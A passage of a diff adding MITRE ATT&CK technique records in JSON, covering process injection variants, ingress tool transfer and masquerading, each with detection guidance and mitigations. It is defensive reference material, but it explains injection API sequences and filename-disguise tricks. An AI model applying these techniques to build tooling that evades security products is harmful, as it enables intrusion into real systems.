"tid": "T1055.001", + "name": "Process Injection: Dynamic-link Library Injection", + "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/001", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.002", + "name": "Process Injection: Portable Executable Injection", + "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/002", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.003", + "name": "Process Injection: Thread Execution Hijacking", + "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\nThis is very similar to Process Hollowing but targets an existing process rather than creating a process in a suspended state. \nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/003", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.004", + "name": "Process Injection: Asynchronous Procedure Call", + "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/004", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.005", + "name": "Process Injection: Thread Local Storage", + "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other Process Injection techniques such as Process Hollowing.(Citation: FireEye TLS Nov 2017)\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/005", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.008", + "name": "Process Injection: Ptrace System Calls", + "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/008", + "detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.009", + "name": "Process Injection: Proc Memory", + "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \nOther techniques such as Dynamic Linker Hijacking may be used to populate a target process with more available gadgets. Similar to Process Hollowing, proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/009", + "detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.011", + "name": "Process Injection: Extra Window Memory Injection", + "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/011", + "detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.012", + "name": "Process Injection: Process Hollowing", + "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. \nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\nThis is very similar to Thread Local Storage but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/012", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.013", + "name": "Process Injection: Process Doppelgänging", + "description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. \nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\nAdversaries may abuse TxF to a perform a file-less variation of Process Injection. Similar to Process Hollowing, process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):\n
    \n
  • Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
    • \n
  • Load – Create a shared section of memory and load the malicious executable.
    • \n
  • Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
    • \n
  • Animate – Create a process from the tainted section of memory and initiate execution.
    • \n
\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/013", + "detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.014", + "name": "Process Injection: VDSO Hijacking", + "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via Ptrace System Calls. However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", + "url": "https://attack.mitre.org/techniques/T1055/014", + "detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + } + ] + }, + { + "rank": 11, + "tid": "T1105", + "name": "Ingress Tool Transfer", + "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.", + "url": "https://attack.mitre.org/techniques/T1105", + "detection": "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "score": 2.066446638475238, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [] + }, + { + "rank": 12, + "tid": "T1036", + "name": "Masquerading", + "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\nRenaming abusable system utilities to evade security monitoring is also a form of Masquerading.(Citation: LOLBAS Main Site)", + "url": "https://attack.mitre.org/techniques/T1036", + "detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\nLook for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE”.", + "score": 2.019819047619048, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + } + ], + "subtechniques": [ + { + "tid": "T1036.001", + "name": "Masquerading: Invalid Code Signature", + "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\nUnlike Code Signing, this activity will not result in a valid signature.", + "url": "https://attack.mitre.org/techniques/T1036/001", + "detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.", + "mitigations": [ + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + } + ] + }, + { + "tid": "T1036.002", + "name": "Masquerading: Right-to-Left Override", + "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique)\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with Spearphishing Attachment/Malicious File since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.", + "url": "https://attack.mitre.org/techniques/T1036/002", + "detection": "Detection methods should include looking for common formats of RTLO characters within filenames such as \\u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.", + "mitigations": [] + }, + { + "tid": "T1036.003", + "name": "Masquerading: Rename System Utilities", + "description": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)", + "url": "https://attack.mitre.org/techniques/T1036/003", + "detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1036.004", + "name": "Masquerading: Masquerade Task or Service", + "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)", + "url": "https://attack.mitre.org/techniques/T1036/004", + "detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [] + }, + { + "tid": "T1036.005", + "name": "Masquerading: Match Legitimate Name or Location", + "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\nAdversaries may also use the same icon of the file they are trying to mimic.", + "url": "https://attack.mitre.org/techniques/T1036/005", + "detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\nIn containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + } + ] + }, + { + "tid": "T1036.006", + "name": 